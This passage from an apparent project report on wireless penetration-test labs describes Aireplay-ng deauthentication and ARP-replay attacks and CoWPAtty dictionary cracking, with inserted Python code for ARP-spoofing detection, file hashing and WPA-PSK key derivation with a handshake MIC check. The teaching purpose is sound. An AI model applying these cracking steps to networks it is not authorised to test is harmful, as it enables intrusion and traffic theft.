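        return None
    return parts[1], parts[3].lower()


def detect_arp_poisoning(log_text, static_bindings=None):
    """Return an alert for every reply whose MAC differs from the MAC already
    known for that IP, and record how many IPs the offending MAC has claimed
    (a poisoner typically claims both the gateway and its victims)."""
    static = dict(static_bindings or {})
    known = dict(static)                    # ip -> mac, provisioned or first seen
    claimed = {}                            # mac -> set of ips it has claimed
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_arp_reply(line)
        if parsed is None:
            continue
        ip, mac = parsed
        claimed.setdefault(mac, set()).add(ip)
        expected = known.get(ip)
        if expected is None:
            known[ip] = mac                 # first sighting: learn it
        elif expected != mac:
            alerts.append({
                "ip": ip,
                "expected_mac": expected,
                "seen_mac": mac,
                "static": ip in static,
                "ips_claimed_by_seen_mac": sorted(claimed[mac]),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_LOG, STATIC_BINDINGS):
        print(alert)
```

Learning a binding from the first reply seen is the weak point of this approach, which is why the gateway is provisioned statically in the example: a poisoner that speaks before the sensor has learnt the real binding would otherwise be trusted. The `static` flag in each alert tells the analyst which conflicts involve a provisioned host.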

AirJack is a device driver, or suite of device drivers, for 802.11 (a/b/g) raw frame injection and reception. This tool was originally made up of a custom driver for Prism II chipset cards. The main functionality of AirJack is based around its ability to send 802.11 deauthenticate frames. The attack utilities included in AirJack contain a Layer 2 man-in-the-middle attack [Beaver 2005].


As shown, knowledge of all these attacks and of the tools used to perpetrate them is very important for the forensic investigator. By addressing the how-to of all these attacks and showing all the features of all the tools, the forensic investigator will gain a deep understanding of how to conduct an investigation and, furthermore, of how to determine what type of attack has been deployed in the wireless network [Hassell 2004].


2. NARRATIVE

The very idea of a wireless network introduces multiple avenues for attack and penetration that are either much more difficult or completely impossible to execute against a standard wired network. Wireless networks only know the boundaries of their own signal, so streets, parks, and nearby buildings all offer a virtual port into the wireless network. There is a general misconception that only large enterprises are at risk from cracking. This is a myth, but it is very prevalent. Large corporations are where the money and sensitive data are. However, a common error is to consider small enterprises and even home user networks to be outside the cracker’s scope because they are not interesting and have low value for an attacker. Small business and home networks provide the cracker with anonymous access, a low probability of getting caught, free bandwidth, and ease of breaking in [Vladimirov 2004].

Security managers need to understand these issues in order to overcome them, and they also need to know the tools that attackers use when conducting an attack on a wireless network. By reviewing how professional ethical hackers deploy a wireless penetration test and all the tools available on the market to conduct an effective wireless investigation, a security manager will gain a deep understanding of which tools should be used in specific situations. There are many tools available for learning how to do penetration testing. However, few targets are available with which to practice pen testing safely and legally [Bayles 2007].


Many people learn penetration tactics by attacking systems on the Internet. Although this might provide a wealth of opportunities and targets, it is highly dangerous because it is illegal. Many people have gone to jail or paid huge fines for hacking Internet sites. Furthermore, for security managers, trying to learn on their live corporate systems is inadmissible [Bayles 2007].

The only real and safe option for those who want to learn penetration testing legally is to create a penetration lab. However, there is the added difficulty of creating real-world scenarios to practice against, especially for those who do not know what a real-world scenario might look like. This obstacle is often daunting enough to discourage many from learning how to deploy a penetration test [Bayles 2007].

2.1 Setting Up a Penetration Test Lab

One of the biggest mistakes people make when developing a lab is to use systems connected to the Internet or to their corporate intranet. A lot of what occurs during a penetration test can be harmful to networks and systems if the test is performed improperly. The penetration tester can shut down the entire network, cutting the company off from revenue and negatively affecting the company’s public image with customers.

2.1.1 Isolating the Pen-test Lab

The best example of this point is Robert Tappan Morris, who was a student at Cornell University in 1988 [Bayles 2007].


Morris released what is considered to be the first worm on the Internet. “He created the worm to try to discover how large the Internet was at the time, and as he has stated his intentions were not malicious” [Bayles 2007]. However, the worm jumped from system to system, copying itself multiple times, and each copy tried to spread itself to other systems on the Internet, creating a denial-of-service attack against the entire Internet. The total estimated damage was between $10 million and $100 million. Morris was tried in a court of law and was convicted. This example makes it clear that someone dealing with anything remotely hazardous to the network should be extremely paranoid and think of security first [Bayles 2007].

Since penetration testing can be a hazardous activity, it is vital that a penetration test lab be completely isolated from any other network. This produces some problems, such as having no Internet connection to look up vulnerability and exploit information or to download patches, applications, and tools. However, to guarantee that nothing in the network leaks out, the penetration tester must take every precaution to make sure the network does not communicate with any other network. Nevertheless, this becomes problematic when the network contains wireless appliances. How can a pen-test lab with wireless access be isolated from other networks? [Bayles 2007]


In a penetration test involving a wireless network, the penetration tester first needs to gain access to the network. It does not matter whether that connection is via the wireless portion of the network or a plug in the wall; all that matters is that access is established. Once access is accomplished, the penetration tester moves on to selecting targets using techniques that work over either wireless or wired networks. So, in order to isolate a pen-test lab with wireless access, the penetration tester needs to have two separate labs [Bayles 2007]: a wireless lab where the penetration tester practices breaking into the wireless access point, and another lab where the penetration tester conducts the system attacks. That way, all future attacks are isolated and do not expose other networks [Bayles 2007].

However, in the many situations in which other wireless access points are in the vicinity of the wireless test lab, the penetration tester must be extremely careful that the attacks deployed reach only the pen-tester’s lab and no other wireless network. On the other hand, the good thing about wireless attacks is that the standard practice is to pinpoint the attacks against the access point using the Media Access Control (MAC) address unique to the wireless access point used in the lab [Bayles 2007].

2.1.2 Securing from Unauthorized Access

Once all the precautions to isolate the pen-test lab are taken, the second step is to secure the pen-test lab from all unauthorized access. Because the penetration test lab should simulate the customer’s network as closely as possible, getting access to the pen-test lab is almost as valuable as gaining access to the production network. Furthermore, it is important to secure install disks and to verify the integrity of all the files and software used in the pen-test lab.


The pen-tester’s effective way to verify the integrity of a file is by using a hash function. Once the pen-tester has downloaded a file, he must verify that he has a true copy of the file by computing an MD5 hash of it and comparing it to the value published by the file’s author [Bayles 2007].
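The check described above, as an added Python example that is not part of the original report: the file is hashed in chunks, the result is compared against the published value in constant time, and the algorithm name is a parameter so the same routine takes SHA-256 when the author publishes one. The "download" and its digests are constructed in the `demo()` function; in practice `path` is the file brought into the isolated lab and `published_digest` the value copied from the author’s site.

```python
"""Verify a downloaded file against the author's published digest.

Added example (not from the original report). MD5 is what the report names;
hashlib.new accepts any supported algorithm name, so "sha256" works the same way.
"""
import hashlib
import hmac
import os
import tempfile


def file_digest(path, algorithm="md5", chunk_size=1 << 16):
    """Hex digest of the file, read in chunks so large ISOs do not fill memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path, published_digest, algorithm="md5"):
    """True only if the file's digest equals the published one.

    Whitespace and case from a copy-pasted value are tolerated; the compare is
    constant-time so the result does not leak through timing."""
    expected = published_digest.strip().lower()
    return hmac.compare_digest(file_digest(path, algorithm), expected)


def demo():
    """Write a constructed file, then check a matching MD5, a non-matching MD5,
    and a matching SHA-256. Returns the three verification results."""
    content = b"constructed tool archive for the isolated lab\n"
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(content)
        path = tmp.name
    try:
        good_md5 = verify_download(path, hashlib.md5(content).hexdigest())
        # MD5 of the empty input stands in for a published digest that does not match.
        bad_md5 = verify_download(path, "d41d8cd98f00b204e9800998ecf8427e")
        good_sha = verify_download(path, hashlib.sha256(content).hexdigest(), "sha256")
        return good_md5, bad_md5, good_sha
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

A digest only proves that the copy matches the author’s file if the published value was obtained over a channel the attacker could not alter; a digest served from the same page as the download detects corruption but not substitution. MD5 collisions are practical, so where the author publishes a SHA-256 value that is the one to check.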

2.1.3 Managing Storage Devices

Another precaution a pen-tester should take is to design a safe way to bring data into the network. Once the pen-test lab is completely isolated, the only way to bring any patches, code, or files into the pen-test lab is by using CDs, DVDs, or thumb drives. However, in order to prevent the leaking of viruses that could have spread across the pen-test lab network, these storage units should be in read-only mode. Also, all CDs and DVDs should be closed after transferring the desired data [Bayles 2007].

Furthermore, not labeling media properly can become a huge problem, especially if someone who is not part of the team picks up a CD or DVD which contains malicious software. Finally, after finishing all the tests it is important to document all the findings. A pen-tester should be careful to write, transport, and archive this information in a secure manner. All other security efforts are meaningless if a malicious person can acquire the final pen-test report, with all the glaring deficiencies and exploitable vulnerabilities summarized along with all the specific steps needed to bring the target network to its knees [Bayles 2007].


2.2 Types of Penetration Test labs

Before starting to build the pen-test lab, it is important to ensure that the pen-tester has the right equipment for the task. Knowing exactly what kind of lab the pen-tester needs is a task that is going to save time and money. There are five possible types [Bayles 2007]:

• The virtual pen-test lab
• The internal pen-test lab
• The external pen-test lab
• The project-specific pen-test lab
• The ad hoc lab

2.2.1 Virtual Pen-Test Lab

The virtual pen-test lab is the smallest lab the pen-tester can build. It is just for starting out learning how to conduct a penetration test. If the main goal of the project is to learn how to attack a system, without worrying about navigating through a network, using virtualization software that can emulate multiple operating systems will provide a wealth of possibilities. Virtualization software has become quite complex and versatile in the past few years [Bayles 2007].


However, some of today’s more sophisticated viruses check for virtualization before launching their malicious payload. This means that attacks using this type of virus against a virtual server will not work, or the pen-tester will not get the expected results. Since a virtual pen-test lab cannot reflect the real-world network in today’s corporate environment, most beginner labs consist of two systems connected through a router. One system is the target, the second system is the penetration tester’s machine, and the router is there to provide network services such as the Domain Name System (DNS) and the Dynamic Host Configuration Protocol (DHCP) [Bayles 2007].

2.2.2 Internal Pen-Test Lab

This setup is called an internal pen-test lab because the penetration tester is given internal network access. The objective of this lab is to see exactly what vulnerabilities exist on the corporate network, not to see whether someone can break into the network. It is assumed that someone who has enough time on his hands will eventually succeed in getting into the network. The main goal of an internal penetration test is to find out exactly what an intruder might grab once he is in [Bayles 2007].


Figure 2.1 A Sample Internal Pen-test lab

2.2.3 External Pen-Test Lab

In order to test vulnerabilities related to how an intruder can get into the corporate network, the test lab to use is the external pen-test lab. This type of lab follows the principle of defense in depth, which means that the lab needs to include a firewall as a bare minimum. Designed to keep bad guys out, a firewall can be a difficult boundary to get past. However, there are exceptions. Often it becomes necessary for firewall administrators to create gaps in the firewall, allowing traffic to enter and leave the network unfettered. Sometimes holes are left open by accident, or because there is an expectation of future need. Figure 2.2 shows a sample external pen-test lab [VAC 2008].


Figure 2.2 A Sample External Pen-test Lab

In external penetration tests, the objective is to see whether there is a way to penetrate past the various obstacles in the network and gain access to a system behind these defenses. Other defenses include the use of a demilitarized zone (DMZ), proxies, the Network Address Translation (NAT) mechanism, network intrusion detection systems, and more. Of course, the more defenses there are, the closer the pen-tester gets to mimicking real-world corporate networks [VAC 2008].

2.2.4 Project-Specific Pen-test lab

Sometimes it is imperative to create an exact replica of the target network. This might be necessary because the production network is so sensitive that management cannot risk any downtime. In this case, the pen-test team needs access to the same equipment as is available in the target network. Project-specific pen-test labs are rarely created because of their high cost, but they do exist. Extreme attention is needed when building this type of lab. It is imperative to replicate the production network accurately, since the pen-tester might get invalid test results if the test lab is not exactly the same as the production network [VAC 2008].


2.2.5 Ad Hoc Lab

The last type of lab is called the ad hoc lab, and often this lab is used to test one specific thing on a server, such as a new patch, or when traffic needs to be sniffed to see whether there are any changes to what is being sent. This type is used frequently even when a more formal lab setup is required. An ad hoc lab is really a shortcut, and it should be an exception to standard practice. A formal process should exist to determine exactly which type of lab is needed for each penetration test project [VAC 2008].

2.3 Pen-Test Lab Description

For the purpose of this project, the external pen-test lab and the internal pen-test lab were used. The external pen-test lab was used to prove how a wireless network can become a backdoor into the main network, and the internal pen-test lab was used to address the most common configuration flaws. These two labs were created in the Network Security Lab following all the steps described above. After defining which test labs were suitable for the project, the second step was to select the right hardware.

2.3.1 Hardware Description

One of the most important hardware components needed for penetration testing is the wireless card. The main technical challenges associated with wireless penetration testing are due to the intrinsic nature of radio frequency (RF) communications and the complexity of the physical medium and the 802.11 specifications [Arbaugh 2003]. Standard wireless equipment only contains a single radio component; therefore, it is only capable of listening to a specific channel at a given moment.


Although there are some tools that use a technique called channel hopping to scan the whole frequency spectrum and sample all the different channels, these tools can only listen for a few milliseconds on each channel. As mentioned before, the Intel PRO/Wireless 3945 802.11 a/b/g wireless card is the wireless card used in this project. Table 2.1 below shows all the specifications and features of this wireless card [VAC 2008].

Table 2.1 Intel PRO/Wireless 3945 802.11 a/b/g wireless card specifications

Main Specifications
  Product Description      Intel PRO/Wireless 3945ABG Network Connection - network adapter
  Device Type              Network adapter
  Form Factor              Plug-in card
  Interface (Bus) Type     Mini-PCI Express
  Data Link Protocol       IEEE 802.11b, IEEE 802.11a, IEEE 802.11g
  Compliant Standards      IEEE 802.11b, IEEE 802.11a, IEEE 802.11g, IEEE 802.1x, Wi-Fi CERTIFIED

Networking
  Spread Spectrum Method   OFDM
  Data Transfer Rate       54 Mbps
  Line Coding Format       DBPSK, DQPSK, CCK, 64 QAM, BPSK, QPSK, 16 QAM

Miscellaneous
  Encryption Algorithm     LEAP, MD5, AES, 128-bit WEP, 64-bit WEP, TLS, PEAP, TTLS, TKIP, WPA, WPA2
  Compliant Standards      UL, cUL, IEC 60950, CB


The Intel PRO/Wireless 3945 802.11 a/b/g wireless card is able to listen to multiple channels at a given moment. However, this card does not have the capability to inject packets for the packet injection attack. In order to overcome this technical handicap, special drivers were installed. Another key component is the wireless access point that was used during the penetration testing. The model chosen was the Linksys WAP54G. Table 2.2 describes the main specifications of this access point.

Table 2.2 Access Point Specifications

Specifications
  Model Number        WAP54G
  Standards           IEEE 802.11g, IEEE 802.11b, IEEE 802.3, IEEE 802.3u
  Ports/Buttons       One 10/100 Auto-Cross Over port, power port, reset and SES button
  Cabling Type        RJ-45
  Security Features   WPA, Linksys Wireless Guard, WEP Encryption, MAC filtering, SSID Broadcast enable/disable
  WEP key bits        64/128-bit

This wireless access point supports data rates up to 54 Mbps and is also compatible with existing 802.11b devices. The WAP54G supports WPA security and 64/128-bit WEP encryption, as well as wireless bridging, wireless repeating, MAC filtering, and event logging. Once the wireless card and the wireless access point used have been described, the second step is to define the software tools that were used [VAC 2008].


2.3.2 Software Description

All the tools used in this project are open source tools available on the Backtrack 3.0 Live CD, plus others downloaded from different URLs. Backtrack is the top-rated Linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-ROM and is fully accessible within minutes. Backtrack has a long history and was based on many different Linux distributions until finally being based on a Slackware Linux distribution. Every package, kernel configuration, and script is optimized to be used by security penetration testers. Also, patches and automation have been added, applied, or developed to provide a neat and ready-to-go environment. Figure 2.3 shows Backtrack 3.0.

Figure 2.3 Backtrack 3.0 Desktop


Backtrack 3.0 is the latest version. This new version supports more and newer hardware and provides more flexibility and modularity. Also, this new version has more than 300 different up-to-date tools, which are logically structured according to the workflow of security professionals. Furthermore, Backtrack 3.0 is aligned with penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This is helpful during daily reporting tasks.

The first tool used is NetStumbler. It is free, easy to install, and simple to use. NetStumbler is a tool for Windows that allows the pen-tester to detect wireless local area networks (WLANs) using 802.11b, 802.11a, and 802.11g. It also provides radio frequency (RF) signal information and other information related to combining computers and radios. NetStumbler sends out a probe request about once a second and reports the responses, with information such as the Service Set Identifier (SSID) and the Media Access Control (MAC) address. This is known as active scanning. Figure 2.4 displays the main screen of NetStumbler [Bayles 2007].


Figure 2.4 NetStumbler Main Screen

One of the weaknesses of NetStumbler is its inability to detect wireless LANs using hidden SSIDs. However, it does include a very useful graphical representation of signal strength (indicated in green) and noise ratio (indicated in red) over time, which is useful for direction finding of wireless LANs (Figure 2.5). Also, with a GPS device NetStumbler can create a file in the .ns1 format, which can be imported into Microsoft’s MapPoint software to produce a graphic representation of any wardriving or site survey [Bayles 2007].


Figure 2.5 Graphical representation of Signal Strength

In order to find the wireless access points that were not broadcasting their SSID, the Kismet tool was used. Kismet is an 802.11 layer two wireless network detector, sniffer, and intrusion detection system which comes with the Backtrack 3.0 Live CD. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic [Hurley 2007].

It identifies networks by passively collecting packets, detecting standard named networks and hidden networks, and inferring the presence of non-beaconing networks via data traffic. Also, Kismet has a very powerful user interface that provides a large amount of information about each access point identified. Figure 2.6 shows the Kismet main interface [Hurley 2007].


Figure 2.6 The Kismet Interface

The network list can be sorted in 14 different ways with the sort options. Once the sort method is defined, additional information about each network can be found. Networks in red are networks whose access point is using factory default settings. Networks in yellow have access points that are broadcasting without any encryption method. The green ones are secure networks with an encryption method in place. The blue ones are access points that are not broadcasting their SSID [Hurley 2007].

As mentioned before, Kismet is a passive detector; however, it captures packets from all the wireless access points in range. This can be dangerous because no one is supposed to be capturing packets. NetStumbler and Kismet were used in the project for wardriving and site surveying [Hurley 2007].


With all the information collected from those two tools, the second step is to attempt to crack the encryption method used by the access point, if any is used. For this purpose the Aircrack-ng 1.0 set of tools was used. Again, this is part of the Backtrack 3.0 Live CD. Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. It implements the FMS attack with some optimizations such as the KoreK attacks. Also, the latest version implements the all-new PTW attack, making the attack much faster compared to other WEP cracking tools [Hurley 2007].

Airodump-ng, which is part of the Aircrack-ng suite of tools, is used for capturing raw 802.11 frames. This tool is particularly suitable for collecting WEP initialization vectors (IVs) with the intent of using them with Aircrack-ng. Airodump-ng can detect all the nearby access points, and it can then be set to listen to one specific access point. Furthermore, to minimize the disk space used by the capture, it can be set to store only the initialization vectors and not the full packet. Yet, in order to crack WPA or use the PTW attack on WEP, the full packet is needed [Hurley 2007].

If no traffic is being generated by the network, the Aireplay-ng tool can be used to inject frames. There are different attacks implemented by this tool. The first one is causing deauthentications, for the purpose of capturing WPA handshake data, recovering a hidden ESSID, or generating ARP requests. This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. In order to crack WPA-PSK, only the four-way (EAPOL) handshake is needed; by forcing an associated client to reconnect, the attacker collects these four packets [Hurley 2007].


Once these packets are collected, the tool used to crack WPA-PSK was CoWPAtty by Joshua Wright, which is a tool for automating the offline dictionary attack to which WPA-PSK networks are vulnerable. CoWPAtty goes through the process of finding the Pairwise Transient Key (PTK) for every word or phrase in a dictionary and checking to see if that PTK generates the correct Message Integrity Check (MIC) value for a given packet. From the four-way handshake packets it first finds the SSID of the network, which is needed in the hashing algorithm to find the Pairwise Master Key (PMK). To find the Pairwise Transient Key (PTK), the random values and MAC addresses that are used in the four-way handshake are needed. Once they are found, they are used with the PMK to find a PTK value [Hurley 2007].

Finally, this value can be used to compute the MIC of a packet. If the calculated MIC matches the MIC given in the packet, the correct passphrase has been found; if not, the process is repeated with the next dictionary word or phrase. In order to speed up the process by three orders of magnitude, a penetration tester can use precomputed hash tables. These tables can be found on the Internet in both 7 GB and 34 GB varieties. The 7 GB tables were created using a dictionary file of 172,000 words and the 1,000 most common SSIDs. If the SSID of the network is not among the 1,000 most common, the penetration tester can generate a table using the genpmk tool included with CoWPAtty. If the passphrase is not included in the dictionary list, the attack will fail. Furthermore, this attack is totally useless if there are no associated wireless clients [Hurley 2007].
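The key hierarchy the two paragraphs above describe in words, carried through in code as an added example that is neither CoWPAtty’s nor this report’s. It follows IEEE 802.11i: the PMK is PBKDF2-HMAC-SHA1 over the passphrase salted with the SSID (4096 iterations, 32 bytes), which is why precomputed tables are SSID-specific and genpmk exists; the PTK comes from a PRF over the PMK, the two MAC addresses and the two nonces; the first 16 bytes of the PTK (the KCK) key the MIC over the EAPOL-Key frame with its MIC field zeroed, HMAC-SHA1 truncated to 16 bytes for WPA2 and HMAC-MD5 for WPA. `mic_matches` is exactly the check an authenticator performs on message 2, which is also why the full EAPOL frame, not just the IVs, must be captured. The handshake, its nonces and MAC addresses are constructed here; the one external value is the PMK test vector from the 802.11i standard’s Annex H ("password"/"IEEE").

```python
"""WPA/WPA2-PSK key derivation and handshake MIC verification (IEEE 802.11i).

Added example, not CoWPAtty's or the report's code. The handshake below is
constructed; only IEEE_TEST_PMK comes from the standard's published vectors.
"""
import hashlib
import hmac

# IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE".
IEEE_TEST_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK: 4096 rounds of PBKDF2-HMAC-SHA1, salted with the SSID (so per-SSID tables)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce, nbytes=64):
    """PTK from the PMK, the two MAC addresses and the two handshake nonces."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck, eapol_mic_zeroed, wpa2=True):
    """MIC over the EAPOL-Key frame with its MIC field zeroed: SHA1 (WPA2) or MD5 (WPA)."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_mic_zeroed, digest).digest()[:16]


def mic_matches(passphrase, ssid, hs):
    """The authenticator's check: does this passphrase reproduce the frame's MIC?"""
    pmk = derive_pmk(passphrase, ssid)
    kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["wpa2"]), hs["mic"])


def make_handshake(passphrase, ssid, wpa2=True):
    """Constructed message 2 of a four-way handshake, with the MIC a real
    supplicant would put on it for the given passphrase and SSID."""
    ap_mac = bytes.fromhex("000f66aabbcc")      # constructed BSSID
    sta_mac = bytes.fromhex("00166f112233")     # constructed client MAC
    anonce = bytes(range(32))                   # constructed nonces (real ones are random)
    snonce = bytes(range(32, 64))
    # EAPOL-Key body: descriptor type, key info, key length, replay counter, SNonce,
    # IV, RSC, ID, MIC (16 zero bytes), key data length: 95 bytes, so the header says 0x005f.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + bytes(8) + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    eapol = b"\x02\x03\x00\x5f" + body
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "wpa2": wpa2, "mic": eapol_mic(kck, eapol, wpa2)}


if __name__ == "__main__":
    print(derive_pmk("password", "IEEE").hex() == IEEE_TEST_PMK)
    hs = make_handshake("correct horse battery staple", "testnetwork")
    print(mic_matches("correct horse battery staple", "testnetwork", hs))
```

Two properties of the derivation explain the numbers in the text. The 4096 PBKDF2 rounds make each candidate passphrase cost a few thousand HMAC operations, which is what the precomputed tables trade disk space for; and because the SSID is the PBKDF2 salt, a table for "linksys" says nothing about "testnetwork", which is why the report mentions generating one with genpmk. The MIC check itself is cheap once the PMK is known, so passphrase length and unpredictability, not the SSID, are what determine how long a dictionary run takes.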


The second attack is fake authentication, which allows the penetration tester to perform the two types of WEP authentication (Open System and Shared Key) to associate with the access point. This is useful when an associated MAC address is needed and there is currently no associated client. If there are associated clients, the interactive packet replay attack can be used. This attack allows the attacker to choose a specific packet for replaying. The attack can obtain packets to replay from two sources: a live flow of packets, or a cap file. Not every captured packet can be replayed; only certain packets can be replayed successfully, meaning that they are accepted by the access point and cause a new initialization vector to be generated [Hurley 2007].

Nevertheless, with certain tools such as packetforge-ng the penetration tester can generate packets and store them in a cap file. Since Aireplay-ng can read from a file containing a packet previously created with packetforge-ng, the penetration tester can successfully inject packets even if no traffic is being generated by any associated client. A better way to generate new IVs is with the ARP request replay attack. In order to deploy this attack, an ARP packet is needed. The program listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. Then, the program retransmits the same ARP packet over and over [Hurley 2007].


As mentioned before, packetforge-ng can generate any type of packet. However, in order to do so, it needs the PRGA (pseudo-random generation algorithm) output. In order to recover the PRGA, Aireplay-ng needs at least one data packet to be received from the access point. Then it attempts to send ARP and/or LLC packets with known content to the access point. If the packet is successfully echoed back by the AP, a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1500 bytes of PRGA are obtained. Once the PRGA is written to a file, packetforge-ng can successfully generate valid packets [Hurley 2007].

Once the pen-tester has access to the wireless network, the next step is to identify the specific services and resources that a target offers. The enumeration process encompasses port scanning, service identification, and fingerprinting attacks. Although there are many different port scanners, they all operate in much the same way. The most common type of scan uses the TCP SYN flag, which appears in the TCP connection sequence or handshake [Hassell 2004].

This type of scan begins by sending a SYN packet to a destination port. The target receives the SYN packet and responds with a SYN/ACK if the port is open or an RST if the port is closed. Because the TCP handshake did not complete, the service on the target does not see a full connection and will usually not log it. The most common tools associated with enumeration include Nmap, Amap, and LanGuard [Hassell 2004].


Other types of port scans use various TCP flags, such as FIN, PUSH, and URG. Different systems respond differently to these packets, so there is an element of OS detection when using these flags. However, the main purpose is to bypass access controls that specifically key on connections initiated with specific TCP flags set. Table 2.3 summarizes the common Nmap options along with the scan types initiated and the expected responses [Hassell 2004].

Table 2.3 Nmap Options and Scan Types [Beaver 2005]

Nmap Switch | Type of Packet Sent            | Response if Open   | Response if Closed            | Description
-sT         | OS-based connect()             | Connection made    | Connection refused or timeout | Basic nonprivileged scan type
-sS         | TCP SYN packet                 | SYN/ACK            | RST                           | Default scan type with root privileges
-sN         | TCP packet with no flags       | Connection timeout | RST                           | Designed to bypass nonstateful firewalls
-sV         | Subprotocol-specific probe     | N/A                | N/A                           | Used to determine the service running on an open port; uses the service database
-O          | Both TCP and UDP packet probes | N/A                | N/A                           | Uses multiple methods to determine the target OS/firmware version


3. SYSTEM RESEARCH

Two pen-test labs were created for the purpose of deploying a penetration testing methodology. The first one is an external pen-test lab, and the second is an internal pen-test lab.

3.1 External pen-test lab

In an external pen-test lab the goal is to determine whether it is possible to penetrate the network without having the permissions to do so [Beaver 2005]. As mentioned before, in this type of lab the defense in depth principle is followed. The layout of the network is shown in Figure 3.1:

Figure 3.1 External Pen-test Lab

The first scenario was designed to be the most insecure of all, where the access point was set up with no security at all. “There have been reported many cases where companies have been attacked through a wireless access point installed without the consent of the security manager” [Beaver 2005].


The access point attacked was unencrypted and the SSID of the network was visible. To find whether an employee had set up a wireless access point, the tool used was NetStumbler. Figure 3.2 shows all the access points broadcasting their SSID.

Figure 3.2 Access Point Broadcasting

There are 14 active access points broadcasting within range of the pen-tester's machine. The information gathered from NetStumbler is that there exists an unauthorized “rogue” access point with an SSID of “testnetwork”, MAC address 00:0F:66:DF:87:45, operating on channel 6, and the vendor is Linksys. Furthermore, the speed is 11 Mbps and it has no security in place. For an attacker this is the best scenario to get in, since there is nothing he has to do besides connecting to the rogue access point; in one step he is on the wired network, bypassing all the security in place. All the security measures such as firewalls, IDS, and routers are useless. The rogue access point serves as an entry door.


A measure that may be taken is to disable SSID broadcasting; in this case the employee does so because he does not want to be caught by the security manager. The pen-tester should be aware of this. Figure 3.3 shows the output of NetStumbler with the wireless access point not broadcasting its SSID [Bayles 2007].

Figure 3.3 Output of Netstumbler

NetStumbler was not able to find the wireless access point with the SSID “testnetwork” when the AP was not broadcasting its SSID. The reason is that NetStumbler transmits a broadcast probe request to discover the WLAN. Most access points respond to a broadcast probe request by default. However, if the access point ceases to respond to such requests, NetStumbler can no longer detect it. It would be wrong to rely on only one tool; a rule of thumb is to try at least two different tools.


The second tool selected is Kismet, a Linux-based tool included in the Backtrack 3.0 Live CD. Figure 3.4 shows all the networks within range of the pen-tester as seen by Kismet.

Figure 3.4 Access Point Broadcasting

By default Kismet is in autofit sort mode. Unfortunately, in this mode the penetration tester cannot obtain much information about the different access points beyond what is displayed in the default view. To change the sort mode, press the s key to bring up a menu of the sort options. Since the goal is to identify the networks that are not broadcasting their SSID, the penetration tester can sort by SSID by choosing the s option.


Once the networks are sorted, there are two wireless access points (APs) that are not broadcasting their SSID. To get additional information about those two networks, use the arrow keys to highlight the access point with no SSID and press Enter to open the Network Details (Figure 3.5).

Figure 3.5 Network Details

In the network details, the penetration tester finds the MAC address (Basic Service Set Identifier [BSSID]) of the wireless access point. Since the max rate is 11.00 Mbps, the penetration tester can determine that it is an 802.11b access point operating in infrastructure mode. Also, information about the manufacturer, which in this case is Linksys, is displayed. Furthermore, although the main screen has an indicator of whether the network is encrypted or not, this indicator does not identify the type of encryption.

Yet, in the network details the penetration tester can get the type of encryption in place, which in this case is none, since there is no encryption. Once all this information is recorded, press the q key to return to the main menu. Another feature of Kismet is that it allows the pen-tester to determine who is actually connected to a network. By highlighting the access point and pressing the c key, the penetration tester is presented with a list of any clients associated with the network. In the client view, the penetration tester can determine the MAC address of any client associated with the access point. Additionally, in some cases, the type of card is displayed. The number of data packets that Kismet has seen and the number of those packets that are encrypted are identified. Once Kismet determines the Internet Protocol (IP) address of a specific client, it is noted as well, along with the strength of the signal [Bayles 2007].

This information is important for identifying the people who, in most cases, are breaking a rule by setting up a rogue access point. With the MAC address a pen-tester can review the company's hardware list. Since the MAC address is unique to each wireless card, the computer with that wireless card in it can be determined. By determining the computer that has the wireless card, the pen-tester can accurately find the name of the employee who is using the rogue access point. Once the pen-tester has determined the existence of a rogue access point, and since the AP has no security enabled, the pen-tester now has access to the wired network. Indeed, all the security measures are useless with the rogue access point in place.


3.1.1 Cracking WEP

